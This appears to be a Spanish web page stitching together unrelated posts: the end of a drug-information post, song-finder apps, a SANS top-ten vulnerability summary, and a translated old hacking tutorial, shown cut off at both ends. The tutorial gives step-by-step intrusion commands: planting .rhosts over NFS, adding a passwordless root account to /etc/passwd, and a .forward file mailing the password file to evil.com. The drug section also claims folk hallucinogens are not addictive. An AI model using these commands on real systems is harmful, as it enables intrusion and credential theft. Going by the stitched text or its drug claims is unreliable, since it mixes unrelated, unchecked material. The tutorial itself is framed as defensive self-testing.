y pureza desafían cualquier descripción. Frecuentemente las visiones llevan una secuencia que va de figuras geométricas a objetos extraños y grotescos, cuyas características varían de un individuo a otro." La ayahuasca La liana de esta será el componente básico de las infusiones de ayahuasca estas infusiones tendrán otros componentes vegetales, lo que dotará a las diversas ayahuascas de una gran variabilidad en su composición y perfil farmacológico. Está produce alucinaciones tanto visuales, como sonoras, tactiles, etc.. La ayahuasca tiene un origen milenario entre las culturas del Amazonia de Colombia, Perú, Bolivia, Ecuador y Brasil, siendo el grupo étnico de los Shipibo Conibo del Perú uno de los más importantes representantes de su uso y práctica en sus ceremonias y ritos de curación desde tiempos muy antiguos. Del mismo modo como resaltan las comunidades Inga y Kamsá en la amazonía colombiana por su importante uso del Yagé para la práctica etnomedicinal. Los chamanes o médicos shipibos (Junes, Onayas, Murayas y Mutsarawas por su rango) herederos del conocimiento ancestral de las diferentes mezclas, preparaciones y usos del ayahuasca, utilizan estas adiciones para diferentes motivos, determinando las plantas que agregan según el efecto u objetivo buscado, ritual, ceremonial o curativo. Hongos psilocibios Los hongos psilocibios son hongos que contienen las sustancias psicoactivas tales como la psilocibina, psilocina, y baeocistina. Existen más de 200 hongos alucinógenos, los más conocidos son los del género Psilocybe. Especies de hongos psilocibios: Psilocybe azurescens Psilocybe baeocystis Psilocybe cubensis Psilocybe cyanescens Psilocybe mexicana Psilocybe quebecensis Psilocybe semilanceata Psilocybe subaeruginosa Psilocybe tampanensis Psilocybe zapotecorum Panaeolus cyanescens (Copelandia cyanescens) Panaeolus cambodginiensis(Copelandia cambodginiensis Gymnopilus junonius (Gymnopilus spectabilis) Weraroa novae-zelandiae. ¿Cómo se consumen?: Se consumen por vía oral, ya sea a través de la ingestión de infusiones hechas con las raíces o flores de las plantas o a través de la ingestión de los hongos secos, al natural o en forma de te. Efectos: Los efectos dependerán – además de todos los factores ya mencionados para las otras drogas- de la potencia de las plantas u hongos consumidos, así como de su forma de preparación. Éstas sustancias provocan en general sensaciones de euforia, hilaridad y signos fisiológicos como el aumento del ritmo cardíaco, de la presión sanguínea y del tamaño de la pupila ocular. Los efectos aparecen en forma más temprana que los del LSD, alrededor de media hora después de haberlas consumido, y tienen una duración menor: de 4 a 9 horas. Tengan mucho cuidado con estos hongos, algunos son venenosos y si los confunden cagaron, con esto no se jode. Cabe aclarar que estas drogas 'folklóricas' no son adictivas. Drogas sonoras/e-drugs Las "e-drugs" se fundamentan en los latidos binaurales, un fenómeno neurológico que consiste en emitir sonidos distintos en cada oído y que estimula el cerebro, produciendo sensaciones de euforia, estados de trance o de relajación, aseguran quienes las consumen. Se trata de sesiones (dosis) de entre 15 y 30 minutos de zumbidos, que se pueden descargar de varios portales especializados a unos precios que oscilan entre los 7 y los 150 euros y que transportan a los usuarios a unas sensaciones fuera de lo común. Expertos en neuropsicología remarcan que los latidos binaurales relajan, ayudan a la concentración y se usan con fines terapéuticos para enfermedades como el autismo. Ciertas frecuencias pueden estimular la imaginación o la creatividad, lo que podría crear las alucinaciones que los consumidores afirman tener durante o después de escuchar las sesiones. Efectos: "Sentí llamas en mis brazos, que bajaban poco a poco hasta los dedos de los pies, tenía la impresión de que mi brazo pesaba una tonelada y uno de mis dedos estaba encorvado. Entonces empecé a sentirme muy raro. Fue genial", relata en un chat "Sugar Killer'", quien dice que ha visto a una tortuga, un elefante verde y hasta un Papá Noel derrapando a los pies de su cama. Se escuchan a través del programa 'Idoser' y su efecto no está ni asegurado, ni comprobado. Tampoco sus efectos secundarios. Fuentes: http://es.wikipedia.org/ , http://html.rincondelvago.com/cocaina_1.html , http://mural.uv.es/sovimur , , , , , http://www.saludalia.com/Saludalia/web_saludalia/vivir_sano/doc/alcohol_y_drogas/doc/lsd.htm , , ) , http://www.lanacion.com.ar/nota.asp?nota_id=1170475&pid=7241912&toi=6278 , , , http://es.wikipedia.org/wiki/Droga#Drogas_duras_y_blandas , , http://www.etnopsico.org/index.php?option=content&task=view&id=63 ATENCIÓN: Este post lo hice con mucho exfuerzo, y resumiendo, no me va el copy-paste, buscando información fiable, en muchos lados... Para que ustedes se informen sobre un tema tan delicado y polémico como este, no pretendo ni hacer apología, ni nada de eso.. Simplemente que la gente si informe
¿Cómo se llama la canción? Si no sabés el nombre de un tema, tenés varias opciones: podés cantar una parte al micrófono, teclear el tono, grabar una parte o utilizar tu celular para saber cuál es. Desde que existen los buscadores de Internet, es fácil buscar el nombre de una canción. Alcanza con escribir algo de la letra para que Google, Bing o Yahoo arroje un resultado exitoso. Pero el tema viene cuando uno no se acuerda nada de la letra, o no sabe el suficiente inglés. Lo bueno es que, aunque sea con acordarse de una parte de la melodía o al menos del estribillo, Internet puede ayudar para encontrar el título, el artista, el álbum y, en fin, todos los datos que se quieran. Hay varias opciones. Es posible utilizar el micrófono y cantar, silbar o tararear parte de la canción, para que alguno de los programas rastree los tonos (aunque hayan sido gritos irreproducibles) y trate de encontrar en la Web de qué canción se trata. También es posible utilizar la barra espaciadora para ingresar parte de la canción y dejar que el soft haga el resto. Pero si se tiene un celular a mano, la cosa puede ser aún más sencilla. Algunos de estos equipos permiten grabar parte de una canción que se está reproduciendo en la radio, para después conectarse a Internet y no sólo mostrar el nombre del tema y del artista, sino también brindar la opción de comprar la melodía en cuestión. - Midomi En este sitio, lo único que hace falta para averiguar de qué canción se trata es cantar un poco, tararear o incluso silbar ante el micrófono la parte que se recuerde. Si bien los resultados no siempre son satisfactorios, la mayoría de las veces el programa da la respuesta correcta. Midomi añade, además, una red social, un estudio de grabación (para grabar nuestras canciones) y la opción de comprar las melodías encontradas (en Estados Unidos nomás la compra, eso sí). Tiene una versión para utilizar en celulares. - SongTapper En este sitio hay que utilizar la barra espaciadora como instrumento para marcar el ritmo de la canción que se busca. El programa regresará todas las canciones posibles que podrían concordar. - Tunatic Este freeware se puede bajar y utilizar tanto en Mac como en PC. Lo que hace es escuchar la canción desde la PC, a través del micrófono, y enseguida la puede rastrear. Sirve, en gran parte, para aquellos que tengan canciones sin el nombre incorporado. - Shazam De la misma forma que Midomi, Shazam es capaz de encontrar la música que se quiera, almacenarlos, enviarlos a redes sociales, pero desde un celular. Se lo puede utilizar en los smartphones Blackberry, iPhone o en los que corran Android. - Nabbit Otra opción para celulares. Es un sistema que conecta la radio del teléfono con Internet para saber de que canción se trata, y posteriormente es posible bajarla al celular. Por ahora funciona sólo en Estados Unidos. - Lyricrat Es una aplicación online, más concretamente un buscador especializado en canciones. Sólo hay que ingresar parte de la letra de un tema para que el sitio indique el nombre del tema. - WatZatsong Una especie de red social musical. Si alguien quiere conocer el nombre de una canción, deberá pedirla grabando su tatareo a través de un micrófono o subiendo un fragmento al servidor. Luego podrá tener respuestas a través de email o a través de una respuesta a su post.
10 Amenazas de la web Sans Institute publica un documento en el que se describen los diez problemas de seguridad más críticos y habituales en Internet -actualmente-, con el fin de que los administradores de sistemas cierren los problemas más comunes y más habitualmente utilizados. El documento, en inglés (aunque existe una traducción al castellano), se actualiza con relativa frecuencia y debería ser revisado a menudo. Además de la vulnerabilidades en sí, se ofrecen consejos y recomendaciones para reducir riesgos. Las diez vulnerabilidades más comunes son: BIND (named) Es el servidor de nombres más popular de Internet, pero las versiones anteriores a la 8.2.2patch5 son vulnerables a numerosos ataques capaces de proporcionar nivel "root" al atacante. CGIs y extensiones en los servidores web Hay que auditar cuidadosamente todos los CGIs accesibles en los servidores web, incluyendo los CGIs que vienen por defecto. Adicionalmente, extensiones como FrontPage y ColdFusion pueden ser inseguros por sí mismos, o contener ejemplos atacables. Vulnerabilidades en sistemas de llamada a procedimiento remoto (RPC), tipo rpc.ttdbserverd, rpc.cmsd y rpc.statd Aunque son conocidos desde hace tiempo, estos fallos siguen presentes en numerosos equipos. Vulnerabilidad RDS en el servidor web de Microsoft (IIS) Diversos errores de seguridad en el Remote Data Services (RDS) permiten a un atacante el ejecutar comandos con privilegios de administrador. Sendmail Sendmail es el servidor de correo (MTA) más utilizado en el mundo UNIX. Los administradores de dichos sistemas deberían mantener el servidor permanentemente actualizado. sadmind y mountd Estos procesos, si no han sido actualizados, contienen errores que permiten la ejecución de código arbitrario como "root". Compartición de discos e información vía NetBIOS, NFS y AppleShare - Deben compartirse sólo los directorios imprescindibles, y sólo desde las máquinas imprescindibles. - El acceso por red a dichas máquinas debe ser el imprescindible. - Las claves empleadas deben ser robustas. - El control de acceso no debe basarse en información DNS, sino en direcciones IP. Cuentas sin clave o con claves de baja calidad Esto es espcialmente grave cuando las cuentas en cuestión tienen privilegios especiales. Vulnerabilidades en los servidores IMAP/POP Estos servicios gestionan los buzones de los usuarios y les proporcionan acceso a su contenido. Normalmente no están protegidos por cortafuegos, ya que suele ser necesario proporcionar el servicio a usuarios desplazados fuera de la red local. "Comunidades" (claves) SNMP por defecto Numerosos equipos con capacidades de administración y monitorización remota vía SNMP (Simple Network Management Protocol) son desplegados sin modificar las claves (comunidades) por defecto. FUENTE ; HISPASEC Crackear sistema (Libro Del Hacker Negro)} Introducción Todos los días, en todo el mundo, las redes de ordenadores y hosts son violados. El nivel de sofisticación de estos ataques varia ampliamente; mientras hay una creencia generalizada que la mayoría de estas intrusiones tienen éxito debido a la debilidad de los passwords, hay todavía un gran numero de intrusiones que hacen uso de técnicas mas avanzadas para entrar. Poco es sabido acerca de este ultimo tipo de intrusiones , debido principalmente a su naturaleza y a su dificultad de ser detectadas. ERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley. Purdue. Sun. Cualquier sistema en Internet (y muchos que no lo están) son susceptibles de ser violados fácilmente. ¿Son estos objetivos inusuales? ¿Que ocurrió? Un hombrejoven, con pelo rubio y grasiento, sentado en una habitación oscura. La habitacion esta iluminada solamente por la luz de la pantalla de 40 caracteres de un C64. Tomando otra larga aspiración de su Benson & Hedges, su cansado sistema cracker “Telnetea” a otro site “.mil” anónimo de su lista de víctimas. No importa. Tiene toda la noche….lo tacha de su lista, y cansinamente teclea la siguiente víctima potencial…. Esta parece ser la imagen habitual de un cracker de sistemas. Joven, sin experiencia, y con un montón de tiempo que perder, tan solo para entrar en otro sistema. Sin embargo, hay un tipo de cracker mucho mas peligroso rondando por ahí. Uno que sabe todo lo ultimo acerca de seguridad de sistemas y herramientas cracking, que puede modificarlas para llevar a cabo ataques específicos, y que puede currarse sus propios programas. Uno que no solo se dedica a leer sobre los últimos agujeros de seguridad, sino que tambien descubre bugs y puntos débiles. Una “criatura mortal” que puede tanto golpear “envenenadamente” , como ocultar su rastro sin un solo susurro o pista. El uebercracker esta aquí.. Por que “uebercracker” ? Es una idea robada, obviamente, del uebermensch de Nietzsche,o , literalmente traducido al ingles, “over man”. Nietzsche uso el termino no para referirse a un super hombre de comic, sino a un hombre que va mas alla de la incompetencia, insignificancia, y debilidad del hombre tradicional. Por lo tanto el uebercracker es el cracker de sistemas que ha ido mas alla de los simples metodos de intrusion de los cookbooks. Un uebercracker no se motiva normalmente para realizar actos violentos. Las victimas no son arbitrariamente escogidas – hay un proposito, tanto como si es por conseguir fines monetarios, un ataque “golpea y corre” para pillar informacion, o un desafio para golpear un prestigioso-gran site o red personalmente. Un uebercracker es dificil de detectar, mas aun de parar, y aun mas si cabe de mantenerlo alejado de tu site por tu bien. Overview En este texto vamos a realizar un acercamiento inusual a los sistemas de seguridad. En vez de decir meramente que algo es un problema, vamos a mirar a traves de los ojos de un intruso, y ver por que lo es. Vamos a ilustrar que incluso los aparentemente inocuos servicios de red pueden convertirse en herramientas muy valiosas a la hora de buscar puntos debiles en un sistema, incluso cuando estos servicios operan del modo esperado. En un esfuerzo por verter algo de luz sobre como ocurren estas intrusiones cada vez mas avanzadas, este texto reseña varios mecanismos usados actualmente por los crackers para obtener acceso a los sistemas y, adicionalmente, algunas tecnicas que sospechamos estan usando, o hemos usado nosotros mismos en tests o ambientes autorizados/amigables. Nuestra motivacion a la hora de ecribir este texto ha sido el hecho de que los administradores de sistemas no son muy a menudo conscientes del peligro existente por cualquier cosa mas alla de los ataques mas triviales. Mientras por todos es sabido que el nivel de proteccion apropiado depende de que es lo que debe ser protegido, muchos sites parecen estar faltos de los recursos para valorar que nivel de proteccion es adecuada. Dando a conocer lo que los intrusos pueden hacer para ganar acceso a un sistema remoto, intentamos ayudar a los administradores de sistemas a tomar decisiones sobre como proteger su site – o como no hacerlo. Limitaremos la discusion a tecnicas que pueden posibilitar el acceso a intrusos a shells en un host corriendo UNIX. Una vez hecho esto, los detalles acerca de como conseguir privilegios root estan mas alla del ambito de este texto – consideramos que son o dependen del site y, en muchos casos, muy triviales para merecer discutirse. Queremos recalcar que no vamos a hacer una lista de bugs o agujeros de seguridad – siempre habra nuevos para que un “atacante” en potencia los explote. El proposito de este texto es el de tratar de que el lector vea su sistema de una forma nueva/diferente – una forma que posiblemente le permita tener la oportunidad de entender como su propio sistema puede estar comprometido, y como. Tambien queremos reiterar que el proposito de este texto es el de enseñar al lector como testear la seguridad de su propio site, y no como irrumpir en sistemas ajenos. Las tecnicas de intrusion ilustradas aquí dejaran muy a menudo huellas en los logs de tu sistema – seria constructivo examinarlos despues de intentar alguno de estos ataques, para ver como seria un ataque verdadero. Ciertamente otros sites y administradores de sistemas tomaran/haran una vision fugaz de tus actividades si es que decides usar sus hosts para hacer tests de seguridad sin autorizacion avanzada; de hecho, es posible que se tomen medidas legales contra tu persona si lo perciben como un ataque. Hay cuatro partes principales en este texto. La primera es la intoduccion y el overview. La segunda parte es un intento de dar a entender al lector lo que es ser un intruso y como de no saber nada de un sistema pasar a comprobar su seguridad. Esta seccion revisa las tecnicas actuales de obtencion de informacion y acceso, y cubre estrategias basicas tales como explotar y abusar de servicios basicos mal configrados (ftp, mail, tftp, etc.). Tambien trata temas un poco mas avanzados, tales como NIS y NFS, asi como bugs tipicos y problemas de configuracion en cierta forma mas especificos de los sitemas operativos o de los sistemas. Tambien se cubre lo referente a estragegias defensivas contra cada uno de los diferentes ataques. La tercera seccion trata sobre confianza: como la seguridad de un sistema depende de la integridad de otros sistemas. La confianza es el tema mas complejo de este texto, y por ser breves limitaremos su discusion a “los clientes ocultos” (si alguien ha entendido esto ultimo que me lo explique ). La cuarta seccion cubre los pasos basicos a seguir por un administrador de sistemas para proteger su sistema. La mayoria de los metodos presentados aquí son meramente de sentido comun, pero son comunmente ignorados en la practica – una de nuestras metas es enseñar lo peligroso que es ignorar estos metodos basicos de seguridad. Estudios practicos, indicadores de informacion relacionada con la seguridad, y software son descritos en los apendices al final del documento. Mientras exploramos los metodos y estrategias que se discuten en este texto vamos a hablar del SATAN ( Security Analysis Tool for Auditing Networks ). Escrito en shell, perl, expect y C, examina un host o sets de hosts remotos y recoge tanta informacion como sea posible explorando remotamente NIS, finger, NFS, ftp y tftp, rexd, y otros servicios. Esta informacion incluye la presencia de varios servicios de informacion de red asi como de defectos potenciales de seguridad – normalmente en la forma de errores en el setup o en la configuracion de los servicios de red, bugs tipicos en las utilidades del sistema o red, o bien decisiones tacticas pobres o ignorantes. Entonces puede bien informar sobre estos datos o usar un sistema experto para investigar mas adelante cualquier problema potencial de seguridad. Mientras el SATAN no usa todos los metodos discutdos en este texto, ha triunfado con “amenazadora” regularidad a la hora de encontrar serios agujeros de seguridad en sites de Internet. Sera posteado y estara disponible via FTP anonimo cuando este completado; El apendice A cubre sus caracteristicas mas destacadas. Observar que no es posible cubrir todos los metodos posibles de irrumpir en los sistemas en un solo texto. De hecho, no vamos a mencionar dos de los metodos mas efectivos de irrupcion en hosts remotos: social engineering ( ingenieria social) y password cracking (crackear passwords). Este ultimo metodo es tan efectivo, sin embargo, que varias de las estrategias presentadas aquí estan basadas en la obtencion de archivos de passwords. Adicionalmente, mientras los sitemas basados en ventanas (X, OpenWindows, etc..) pueden proveer una “tierra fertil” para la irrupcion/violacion/explotacion, simplemente no sabemos muchos metodos usados para irrumpir en sistemas remotos. Muchos crackers de sistemas usan terminales non-bitmapped que les pueden prevenir de usar algunos de los metodos de explotacion efectiva mas interesantes para sistemas basados en ventanas (aunque el ser capaz de ver/monitorizar el teclado de la victima es normalmente suficiente para pillar passwords). Finalmente, mientras gusanos, virus, caballos de troya, y demas movidas son muy interesantes, no son comunes ( en sistemas basados en UNIX) y probablemente usan tecnicas muy similares a las descritas en este documento como partes individuales de su estrategia de ataque. Ganando Informacion Asumamos que tu eres el administrador de sistema de “Victim Incorporated’s network of Unix workstations”. En un esfuerzo por proteger tus maquinas, le pides a un colega administrador de sistema de un site cercano (evil.com) que te de una cuenta en una de sus maquinas para asi poder ver la seguridad de tu propio sistema desde el exterior. Que deberias hacer? Lo primero, tratar de recoger informacion sobre tu blanco, tu host. Hay un monton de servicios de red en los que mirar: finger, showmount y rpcinfo son buenos puntos de partida. Pero no te pares ahi – debes tambien utilizar DNS, whois, sendmail (smtp), ftp, uucp, y tantos otros servicios como puedas encontrar. Hay tantos metodos y tecnicas que el espacio nos impide enseñaros todos, pero trataremos de enseñar una representativa de las estrategias mas comunes y/o peligrosas que hemos visto o que se nos han ocurrido. Idealmente, podrias recoger dicha informacion sobre todos los hosts en la subred o area de ataque – la informacion es poder – pero por ahora examinaremos solo nuestra victima/blanco en cuestion. Para comenzar, miraremos lo que el comando finger nos ha reportado. (imagina que son las 6pm, 6 Noviembre, 1993): victim % finger @victim.com [victim.com] Login Name TTY Idle When Where zen Dr. Fubar co 1d Wed 08:00 death.com Bien! Un solo usuario inactivo – se supone que nadie va a notar si intentas irrumpir dentro. Ahora intentas mas tacticas. Como todos los devotos del finger sabran, hacer finger “@”, “0”, y "", asi como a nombre comunes, como root, bin, ftp, system, guest, demo, manager, etc…, puede revelar informacion interesante. Lo que esa informacion sea depende de la version de finger que tu victima este usando, pero la mas importante son nombres de cuentas, conjuntamente con sus home directories y el ultimo host desde el que se conectaron. Para añadir a esta informacion, puedes tambien usar rusers (en particular con la extension -l ) para pillar informacion valiosa sobre usuarios conectados. Usando estos comandos en victim.com nos da la siguiente informacion, presentada de forma tabulada comprimida para ahorrar espacio: Login Home-dir Shell Last login, from where root / /bin/sh Fri Nov 5 07:42 on ttyp1 from big.victim.com bin /bin Never logged in nobody / Tue Jun 15 08:57 on ttyp2 from server.victim.co daemon / Tue Mar 23 12:14 on ttyp0 from big.victim.com sync / /bin/sync Tue Mar 23 12:14 on ttyp0 from big.victim.com zen /home/zen /bin/bash On since Wed Nov 6 on ttyp3 from death.com sam /home/sam /bin/csh Wed Nov 5 05:33 on ttyp3 from evil.com guest /export/foo /bin/sh Never logged in ftp /home/ftp Never logged in Tanto nuestros experimentos con el SATAN como el ver en funcionamiento system crackers nos ha demostrado que el finger es uno de los servicios mas peligrosos, por su valor a la hora de investigar una victima potencial. De todas formas, mucha de esta informacion solamente es valiosa usada conjuntamente con otros datos. Por ejemplo, ejecutando showmount (informacion sobre el montaje de un servidor)en tu victima nos revela lo siguiente: evil % showmount -e victim.com export list for victim.com: /export (everyone) /var (everyone) /usr easy /export/exec/kvm/sun4c.sunos.4.1.3 easy /export/root/easy easy /export/swap/easy easy Notar que /export/foo esta “exportado al mundo”; tambien fijaros que este es el home directory del usuario “guest”. Es hora de tu primera intrusion! En este caso, montaras el home directoy del usuario “guest”. Como no tienes la cuenta correspondiente en esa maquina y como root no puede modificar archivos en un sistema de archivos NFS, creas una cuenta “guest” en tu archivo de password local. Como usuario “guest” puedes colocar una “.rhosts entry” en el guest home directory remoto, que te permitira acceder a dicha maquina sin tener que dar ningun password. evil # mount victim.com:/export/foo /foo evil # cd /foo evil # ls -lag total 3 1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 . 1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 .. 1 drwx--x--x 9 10001 daemon 1024 Aug 3 15:49 guest evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd evil # ls -lag total 3 1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 . 1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 .. 1 drwx--x--x 9 guest daemon 1024 Aug 3 15:49 guest evil # su guest evil % echo evil.com >> guest/.rhosts evil % rlogin victim.com Welcome to victim.com! victim % Si, en lugar de home directories, victim.com exportara sistemas de archivos con comandos de usuario (como , /usr o /usr/local/bin), podrias reemplazar un comando por un caballo de troya que ejecutara cualquier comando de tu eleccion. El siguiente usuario en ejecutar dicho comando ejecutaria tu programa Sugerimos que se exporten estos sistemas de archivos: Lectura/excritura solo a clientes especificos y de confianza Solo-lectura, donde sea posible (datos o programas pueden ser exportados de esta forma) Si la victima tiene un “+” wildcard en su /etc/hosts.equiv (por defecto en varias maquinas) o tiene el netgroups bug , cualquier usuario no root con un login en el fichero de passwords de la victima puede hacer un rlogin (login remoto) a la victima sin necesidad de password. Y como el usuario “bin” normalmente tiene ficheros llave y directorios, tu siguiente ataque es el de tratar de acceder en el host de la victima y modificar el fichero de passwords para permitirte tener acceso “root”: evil % whoami bin evil % rsh victim.com csh -i Warning: no access to tty; thus no job control in this shell... victim % ls -ldg /etc drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc victim % cd /etc victim % mv passwd pw.old victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd victim % ^D evil % rlogin victim.com -l toor Welcome to victim.com! victim # Unas pocas notas sobre el metodo usado arriba; "rsh victim.com csh -i" se usa para inicialmente entrar en el sistema ya que no deja ningun rastro en los ficheros wtmp o utmp, haciendo el comando rsh invisible para el finger y el who. El shell remoto no esta unido a un pseudo-terminal, asi que los prgramas tipo pagers y editores fallaran – pero es de gran utilidad para una breve exploracion. La utilidad de seguridad COPS (ver apendice D) informara de archivos o directorios que son “escribibles” a otras cuentas aparte de la superuser. Si usas SunOS 4.x puedes aplicar el patch 100103 para arreglar muchos de los problemas de permisos de ficheros. En muchos sistemas, rsh lo prueba en lo expuesto arriba, aun cuando tenga éxito, seguira siendo completamente innotificable; el tcp wrapper (apendice D), que “logea” conexiones entrantes, puede ayudar a desenmascarar dichas actividades. --- Y ahora que? Has destapado ya todos los agujeros del sistema-victima? Volviendo a los resultados dados por el finger en nuestra victima, te das cuenta de que tiene una cuenta “ftp”, que normalmente significa que se puede hacer ftp anonimo. Ftp anonimo puede ser una forma facil de conseguir acceso, ya que esta muchas veces mal configurado. Por ejemplo, la victima debe de tener una copia completa del fichero /etc/passwd en su ftp anonimo -ftp/etc en vez de una version reducida. En este ejemplo, sin embargo, puedes ver que este ultimo no parece ser el verdadero (como puedes afirmarlo sin haber examinado el archivo?) Sin embargo, el home directory de “ftp” en victim.com es escribible. Esto te permite ejecutar comandos remotamente – en este caso, mandarte el archivo por mail a ti mismo – por el simple metodo de crear un archivo .forward que ejecuta un comando cuando un mail es mandado a la cuenta “ftp”. evil % cat forward_sucker_file "|/bin/mail zen@evil.com < /etc/passwd" evil % ftp victim.com Connected to victim.com 220 victim FTP server ready. Name (victim.com:zen): ftp 331 Guest login ok, send ident as password. Password: 230 Guest login ok, access restrictions apply. ftp> ls -lga 200 PORT command successful. 150 ASCII data connection for /bin/ls (192.192.192.1,1129) (0 bytes). total 5 drwxr-xr-x 4 101 1 512 Jun 20 1991 . drwxr-xr-x 4 101 1 512 Jun 20 1991 .. drwxr-xr-x 2 0 1 512 Jun 20 1991 bin drwxr-xr-x 2 0 1 512 Jun 20 1991 etc drwxr-xr-x 3 101 1 512 Aug 22 1991 pub 226 ASCII Transfer complete. 242 bytes received in 0.066 seconds (3.6 Kbytes/s) ftp> put forward_sucker_file .forward 43 bytes sent in 0.0015 seconds (28 Kbytes/s) ftp> quit evil % echo test | mail ftp@victim.com Ahora simplemente tienes que esperar a que el fichero de passwords te sea enviado. La herramienta de seguridad COPS chequeara el setup de tu ftp anonimo; mirar la documentacion man sobre ftpd, la documetacion/codigo de COPS, o el CERT advisory 93:10 para recoger informacion acerca de como establecer (setup, por si hay dudas) ftp anonimo correctamente. Vulnerabilidades en el ftp son normalmente cusetion de una posesion incorrecta o de los permisos de archivos y directorios. Al menos, estate seguro de que -ftp y todos los directorios y ficheros “system” por debajo de -ftp son de root y que no tienen privilegios de escritura para ningun usuario. Examinando ftp, puedes probar un viejo bug que en su dia fue bastamente explotado: % ftp -n ftp> open victim.com Connected to victim.com 220 victim.com FTP server ready. ftp> quote user ftp 331 Guest login ok, send ident as password. ftp> quote cwd ~root 530 Please login with USER and PASS. ftp> quote pass ftp 230 Guest login ok, access restrictions apply. ftp> ls -al / (o lo que sea) Si esto funciona, estaras dentro como root, y con capacidad para modificar el fichero passwd, o lo que desees. Si tu sistema tiene este bug, tienes que conseguir un update de tu ftpd daemon, ya sea de tu vendedor o por ftp anonimo en ftp.uu.net. El wuarchive ftpd, un conocido “recambio” del ftp daemon dado por la Washington University in Saint Louis, tenia casi el mismo problema. Si tu wuarchive ftpd es anterior a Abril de 1993, deberias reemplazarlo por una version mas reciente. hay un programa similar a ftp – tftp, o trivial file transfer program. Este daemon no necesita de ningun password para autentificacion; si un host provee de tftp sin restringir el acceso (normalmente mediante algun flag seguro puesto en el archivo inetd.conf), un atacante podria leer y escribir archivos en cualquier lugar del sistema. En el ejemplo, pillas el fichero passwd y se pone en tu directorio /tmp local: evil % tftp tftp> connect victim.com tftp> get /etc/passwd /tmp/passwd.victim tftp> quit Por el bien de la seguridad, tftp no deberia de ejecutarse; si tftp es necesario, utiliza la opcion/flag segura para restringir el acceso a un directorio que contenga informacion sin valor, o ejecutalo bajo el control de un programa chroot wrapper. ----- Si ninguno de los metodos anteriores ha funcionado, es hora de tomar medidas mas drasticas. Tu nuevo amigo es rpcinfo, otro programa de gran utilidad, muchas veces incluso mas practico que el finger. Muchos hosts tienen servicios RPC que pueden ser explotados; rpcinfo puede hablar con el portmapper y enseñarte el camino. Puede decirte si el host esta usando NIS, si es un servidor o esclavo NIS, si hay una estacion de trabajo sin disquetera por ahi, si esta usando NFS, cualquiera de los servicios de info (rusersd, rstatd, etc..), o cualquier otro programa inusual (relacionados con logs y seguridad). Por ejemplo, volviendo a nuestra victima: evil % rpcinfo -p victim.com program vers proto port 100004 2 tcp 673 ypserv 100005 1 udp 721 mountd 100003 2 udp 2049 nfs 100026 1 udp 733 bootparam 100017 1 tcp 1274 rexd En este caso, puedes ver varios datos significativos sobre nuestra victima; el primero de los cuales es que es un servidor NIS. Puede que no sea muy sabido, pero una vez que se conoce el nombre de dominio NIS de un servidor, puedes tener cualquiera de sus mapas NIS con una simple orden rpc, incluso cuando estas fuera de la subred del servidor NIS (por ejemplo, usando el programa YPX que se puede encontrar en los archivos comp.sources.misc en ftp.uu.net). Adicionalmente, tanto como los facilmente adivinables passwords, muchos sistemas usan nombres de dominio NIS facilmente adivinables. Tratar de adivinar el nombre de dominio NIS es normalmente provechoso/fructifero. Los mayores candidatos son los nombres del host en forma parcial y total (e.g. “victim” and “victim.com”, el nombre de la organización, nombres del grupo dados por el comando “showmount”, y demas. Si quisieras probar si el nombre de dominio fuera “victim”, teclearias: evil % ypwhich -d victim victim.com Domain victim not bound. Como se ve este fue un intento sin éxito; si huiera sido correcto “victim”, nos habria dado un mensaje con el nombre de host del servidor NIS. De todas formas, fijaros de la seccion NFS que victim.com esta exportando el directorio “/var” al mundo. Todo lo que se necesita es montar dicho directorio y mirar en el subdirectorio “yp” – entre otras cosas veras otro subdirectorio que contiene el nombre de dominio de la victima. evil # mount victim.com:/var /foo evil # cd /foo evil # /bin/ls -alg /foo/yp total 17 1 drwxr-sr-x 4 root staff 512 Jul 12 14:22 . 1 drwxr-sr-x 11 root staff 512 Jun 29 10:54 .. 11 -rwxr-xr-x 1 root staff 10993 Apr 22 11:56 Makefile 1 drwxr-sr-x 2 root staff 512 Apr 22 11:20 binding 2 drwxr-sr-x 2 root staff 1536 Jul 12 14:22 foo_bar [...] En este caso “foo_bar” es el nombre de dominio del NIS. Adicionalmente, los mapas NIS contienen normalmente una buena lista de nombres de usuarios/empleados asi como listas de hosts internos, por no mencionar passwords para crackear. El apendice C detalla los resultados de un caso practico sobre archivos de passwords NIS. ----- Puedes observar que la respuesta dada por el comando rpcinfo mostraba que victim.com usaba rexd. Como el rsh daemon, rexd procesa peticiones del tipo “por favor ejecuta este comando como ese usuario (como siendo ese usuario)”. A diferencia de rshd, rexd no tiene en cuenta si el host cliente esta o no en los archivos hosts.equiv o .rhost. Normalmente el programa rexd cliente es el comando “on”, pero tan solo es necesario un pequeño programa en C para mandar informacion arbitraria sobre el host y userid cliente al servidor rexd; rexd ejecutara tan contento el comando. Por estas razones, ejecutar rexd es similar a no tener passwords: toda la seguridad esta en el cliente, no en el servidor que es donde deberia. La seguridad del rexd puede ser mejorada de alguna manera usando un RPC seguro. ----- bservando de nuevo la respuesta de rpcinfo, puedes observar que victim.com parece ser un server para estaciones de trabajo sin disqueteras. Esto se evidencia debido a la presencia del servicio bootparam, que provee informacion a los clientes sin disquetera para el arranque. Si lo preguntas correctamente, usando BOOTPARAMPROC_WHOAMI y dando la direccion de un cliente, puedes obtener su nombre de dominio NIS. Esto puede ser de gran utilidad cuando es combiando con el hecho de que puedes conseguir mapas NIS arbitrarios (como el fichero password) cuando sabes el nombre de dominio. Aquí va un ejemplo de codigo para hacer justo eso: char *server; struct bp_whoami_arg arg; /* query */ struct bp_whoami_res res; /* reply */ /* initializations omitted... */ callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS, BOOTPARAMPROC_WHOAMI, xdr_bp_whoami_arg, &arg, xdr_bp_whoami_res, &res); printf("%s has nisdomain %sn", server, res.domain_name); El resultado del comando showmount indicaba que “easy” es un cliente sin disquetera de victim.com, asi que usamos su direccion de cliente en el query BOOTPARAMPROC_WHOAMI: evil % bootparam victim.com easy.victim.com victim.com has nisdomain foo_bar ----- Los NIS masters controlan los alias del mail para el dominio NIS en cuestion. Como en los ficheros de alias de mail locales, puedes crear un mail alias que ejecutara comandos cuando el mail le es mandado(un ejemplo popular de 